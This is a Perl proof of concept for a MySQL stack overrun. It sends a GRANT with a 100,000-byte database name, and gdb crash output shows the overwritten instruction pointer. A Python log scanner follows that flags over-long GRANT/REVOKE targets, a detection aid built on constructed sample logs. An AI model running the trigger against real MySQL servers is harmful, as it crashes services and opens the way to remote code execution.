#!/usr/bin/perl
=for comment
MySQL Server exploitable stack based overrun
Ver 5.5.19-log for Linux and below (tested with Ver 5.1.53-log for suse-linux-gnu too)
unprivileged user (any account (anonymous account?), post auth)
as illustrated below, the instruction pointer is overwritten with 0x41414141
bug found by Kingcope
this will yield a shell as the user 'mysql' when properly exploited
mysql@linux-lsd2:/root> gdb -c /var/lib/mysql/core
GNU gdb (GDB) SUSE (7.2-3.3)
Copyright (C)2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i586-suse-linux".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Missing separate debuginfo for the main executable file
Try: zypper install -C "debuginfo(build-id)=768fdbea8f1bf1f7cfb34c7f532f7dd0bdd76803"
[New Thread 8801]
[New Thread 8789]
[New Thread 8793]
[New Thread 8791]
[New Thread 8787]
[New Thread 8790]
[New Thread 8799]
[New Thread 8794]
[New Thread 8792]
[New Thread 8788]
[New Thread 8800]
[New Thread 8786]
[New Thread 8797]
[New Thread 8798]
[New Thread 8785]
[New Thread 8796]
[New Thread 8783]
Core was generated by `/usr/local/mysql/bin/mysqld --log=/tmp/mysqld.log'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb)
=cut
use strict;
use DBI();
# Connect to the database.
my $dbh = DBI->connect("DBI:mysql:database=test;host=192.168.2.3;",
"user", "secret",
{'RaiseError' => 1});
# Over-long database name (100000 bytes) used as the target of the GRANT;
# this is what overruns the stack on the affected server versions.
$a = "A" x 100000;
my $sth = $dbh->prepare("grant file on $a.* to 'user'\@'%' identified by 'secret';");
$sth->execute();
# Disconnect from the database.
$dbh->disconnect();
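The PoC triggers the overrun with a single GRANT whose ON target is a 100000-character database name, far beyond the 64-character limit MySQL places on database and table identifiers. As an added example that is not part of Kingcope's script, the Python check below scans MySQL general-query-log entries and flags GRANT/REVOKE statements whose ON target exceeds that limit, which is how a DBA or analyst could spot this pattern after the fact. The log-line layout the parser expects and the sample entries are constructed for this example.

```python
import re

# Hard limit MySQL enforces on database and table names.
MAX_IDENTIFIER_LEN = 64

# Privilege object of GRANT/REVOKE: "... on <db>.<table> ...". The <db> part may
# be bare, backtick-quoted, or "*". The non-greedy ".+?" skips the privilege list.
TARGET_RE = re.compile(
    r"^\s*(?:grant|revoke)\b.+?\bon\b\s+(?:`(?P<quoted>[^`]*)`|(?P<bare>[^\s.`]+))",
    re.IGNORECASE | re.DOTALL,
)

# Assumed general-query-log layout (constructed for this example):
#   "<date> <time>\t<thread id> <command>\t<statement>"
# where continuation lines may omit the date/time prefix.
LOG_RE = re.compile(
    r"^(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(?P<tid>\d+)\s+(?P<cmd>Query|Execute)\s+(?P<sql>.*)$"
)

# Constructed sample log: one benign grant, one bare 300-char target,
# one backtick-quoted 70-char target.
SAMPLE_LOG = [
    "120312 10:11:12\t    5 Connect\tuser@192.168.2.3 on test",
    "\t\t    5 Query\tselect 1",
    "\t\t    5 Query\tgrant select on test.* to 'user'@'%'",
    "\t\t    6 Query\tgrant file on " + "A" * 300 + ".* to 'user'@'%' identified by 'secret'",
    "\t\t    7 Query\tgrant file on `" + "B" * 70 + "`.* to 'user'@'%'",
]


def grant_target(sql):
    """Return the database identifier named after ON in a GRANT/REVOKE, else None."""
    m = TARGET_RE.match(sql)
    if not m:
        return None
    return m.group("quoted") if m.group("quoted") is not None else m.group("bare")


def scan_log(lines, limit=MAX_IDENTIFIER_LEN):
    """Return (thread id, identifier length, preview) for every GRANT/REVOKE whose
    ON target is longer than the server's identifier limit."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # connection records and unparseable lines are skipped
        target = grant_target(m.group("sql"))
        if target is None or len(target) <= limit:
            continue
        findings.append((int(m.group("tid")), len(target), target[:16] + "..."))
    return findings


if __name__ == "__main__":
    for tid, length, preview in scan_log(SAMPLE_LOG):
        print(f"thread {tid}: GRANT/REVOKE target is {length} chars "
              f"(limit {MAX_IDENTIFIER_LEN}): {preview}")
```

The general log must be enabled for this to see anything; in production the same check fits better as a rule on whatever pipeline already ingests the query log, with the threshold left at the identifier limit so that only malformed statements fire.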